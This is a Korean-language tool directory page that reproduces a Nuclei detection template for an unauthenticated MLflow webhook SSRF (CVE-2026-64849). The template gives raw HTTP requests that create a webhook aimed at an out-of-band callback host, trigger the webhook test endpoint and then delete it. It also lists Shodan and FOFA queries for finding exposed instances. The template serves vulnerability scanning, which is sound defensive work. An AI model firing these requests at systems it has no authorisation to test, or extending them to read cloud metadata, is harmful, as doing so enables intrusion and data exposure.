Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-64849.yaml — 내부 또는 클라우드 메타데이터 서비스에 접근하고 리다이렉트 우회를 통해 응답 세부 정보를 유출하는 인증되지 않은 MLflow webhook SSRF(CVE-2026-64849)를 탐지합니다. | Kitploit
도구/GitHubGitHub/zavisco/cve-2026-64849.yaml
Vulnerability ScannersExploitationWeb Application ExploitationAPI Security TestingInformation GatheringCloud Security
GitHubzavisco/cve-2026-64849.yaml

CVE-2026-64849.yaml

내부 또는 클라우드 메타데이터 서비스에 접근하고 리다이렉트 우회를 통해 응답 세부 정보를 유출하는 인증되지 않은 MLflow webhook SSRF(CVE-2026-64849)를 탐지합니다.

저장소 보기
1일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

id: CVE-2026-64849

info: name: MLflow 웹훅 SSRF - 리다이렉트 우회를 통한 인증 없는 전체 읽기 author: DhiyaneshDk severity: critical description: | MLflow > 3.15.0은 웹훅 URL 검증 부적절로 인한 정보 공개 취약점을 포함하며, 공격자가 내부 또는 클라우드 메타데이터 서비스에 도달하여 응답 세부 정보를 획득할 수 있습니다. 이 취약점 악용에는 웹훅 테스트 엔드포인트에 대한 인증 없는 접근이 필요합니다. impact: | 공격자는 내부 또는 클라우드 메타데이터 서비스에 접근하여 응답 상태와 본문을 검색할 수 있으며, 잠재적으로 민감한 정보가 노출될 수 있습니다. remediation: | 리다이렉트 대상 및 DNS 리바인딩을 포함한 연결 시점 IP 검증을 제공하는 SSRFProtectedHTTPAdapter를 추가한 PR #24258이 포함된 버전으로 MLflow를 업그레이드하십시오. reference: - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j - https://github.com/mlflow/mlflow/pull/24258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2026-64849 epss-score: 0.00349 epss-percentile: 0.27929 cwe-id: CWE-918 metadata: max-request: 3 verified: true shodan-query: http.title:"MLflow" fofa-query: title="MLflow" tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev

variables: random: "{{rand_text_alpha(8)}}"

http:

  • raw:

    • | POST /api/2.0/mlflow/webhooks HTTP/1.1 Host: {{Hostname}} Content-Type: application/json

      {"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}

    • | POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json

      {"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}

    • | DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1 Host: {{Hostname}}

    matchers-condition: and matchers:

    • type: word part: body_1 words:

      • "webhook_id"
      • "ACTIVE" condition: and
    • type: word part: interactsh_protocol words:

      • "http"

    extractors:

    • type: regex name: webhook_id part: body internal: true regex:
      • '"webhook_id":\s*"([^"]+)"' group: 1

digest: 490a0046304402202e79c8a66a1a62e91bddc38dcebe402ecee4ff7036a36448e522f5bd64c13a8702203f2da52bd9424be56645e2866f623392ae4455c8d8c68549ab3d368fb7ff91c2:922c64590222798bb761d5b6d8e72950

도구 다운로드